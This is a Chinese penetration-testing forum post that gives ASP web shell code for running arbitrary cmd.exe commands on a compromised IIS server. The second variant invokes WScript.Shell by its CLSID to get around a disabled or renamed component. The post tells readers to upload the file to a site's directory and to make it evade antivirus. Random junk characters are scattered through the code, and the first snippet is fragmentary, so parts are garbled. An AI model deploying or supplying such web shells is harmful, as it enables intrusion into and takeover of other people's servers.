找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
返回列表 发新帖
查看: 3255|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。& _: u2 m6 ^7 i, b5 u- j
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
    , R: h- M0 d2 v7 q/ @3 _; c7 S
  • 要想让运行命令可以试试这种方法,成功率为五五之数。' Y  n! H$ @/ N
  • 把下面代码复制:
    ; y: Z( r' R9 c7 P
  • <%
    8 a6 x* x1 Z3 X$ i, v, R
  • end if
    ' v; z$ o1 z4 o/ q, _
  • response.write(”")
    & P& z8 U! H, ^. t/ |7 D+ X
  • On Error Resume ' U1 x* j+ \6 Q# [7 x; B( s
  • Next& j- u7 r, l1 F; b8 _
  • response.write oScriptlhn.exec(”cmd.exe /c” &
    2 k8 M- n4 w- n6 R5 Y9 b6 O' A2 Z, g
  • request(”c”)).stdout.readall
    5 o, E7 ~( _" W" k
  • response.write(”")
    ! e) _# S" Q. s6 Q
  • response.write(”")
    " b" L- u# t( ^4 \
  • response.write(”
    1 K7 J2 R2 r: f# r' X
  • “)
      a4 {7 @) W' o& h: Y
  • response.write(”")5 X+ ~5 a+ V: @/ ]9 `
  • %>9 m% z! s0 z7 q* i3 B
  • 保存为一个asp文件,然后传到网站目录上去
    " }: }5 @5 B& }1 \, A/ D7 Z  S  S1 [
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。, ^5 \( s! y" T  R# r
  • 我用此成功运行过cacls命令。
      o$ D) U6 s' a3 @
  • 第二那就是运行时出错,可能限制某些代码执行/ u4 W' \, f% A& k8 C3 s8 n
  • 无wscript.shell组件提权又一个方法
    4 `: D  s7 p' k. W  {! S/ T
  • <object runat=server id=oScriptlhn scope=page . U) B6 t6 K- b8 @6 G, c$ a9 L

  • " Z) S. r. I2 B1 _9 g" d
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>9 _- N' _6 q5 l9 p( m9 }" s7 w# c
  • <%if err then%>
    4 m* m# V1 f) m0 a' y
  • <object runat=server id=oScriptlhn scope=page
    ; s1 K, H' [3 E: u, F3 o5 ~$ N
  • ( y# T) k3 n1 r. G6 ^
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>7 X/ s1 h( K0 Y  U9 j
  • <%
    1 ~/ E* ?1 E9 j5 f
  • end if - n1 N2 m; d# t) B
  • response.write(”<textarea readonly cols=80 " c  \8 e$ E+ h; d$ I1 ?" `3 W0 E
  • " v5 |9 r9 L8 ]4 V- p% o0 O
  • rows=20>”) . x- i; W: ?- W
  • On Error Resume Next
    " ^9 j2 p; ]) f' h4 |/ t9 A; [
  • response.write 6 W4 V- j; ~; b2 a

  • . e; |/ f2 G% e% A
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    7 w  N$ t8 F* I- I7 ]) s8 ]( R0 x, V8 g
  • response.write(”</textarea>”)
    : v- M; V1 U2 d* j; e8 u. |7 E
  • response.write(”<form
    ; k7 j3 o2 P1 b* n8 S0 V9 |8 S- X
  • 3 A' A# {, P' p
  • method=’post’>”) & u: g. e& T; x4 c7 u
  • response.write(”<input type=text name=’c' - i. ?+ g/ n* b% Q* |
  • , }  i% V2 R4 j. v- o
  • size=60><br>”)
    * r0 {7 h/ Q: _" i0 E1 o; Y
  • response.write(”<input type=submit
    9 M% M+ n. t8 m! \
  • 0 U8 c9 }0 ~* e- u# A) F7 l' \& M# X
  • value=’执行’></form>”)
    ' v5 z7 [3 r& I- q5 w
  • %>
    ! {$ q7 v% O7 ?8 Q  }
  • 保存为ASP,此代码可能被杀,请注意免杀。9 j( ]- L& p% ~
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    # k( X7 w0 t% Z4 y- Z" _; U
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表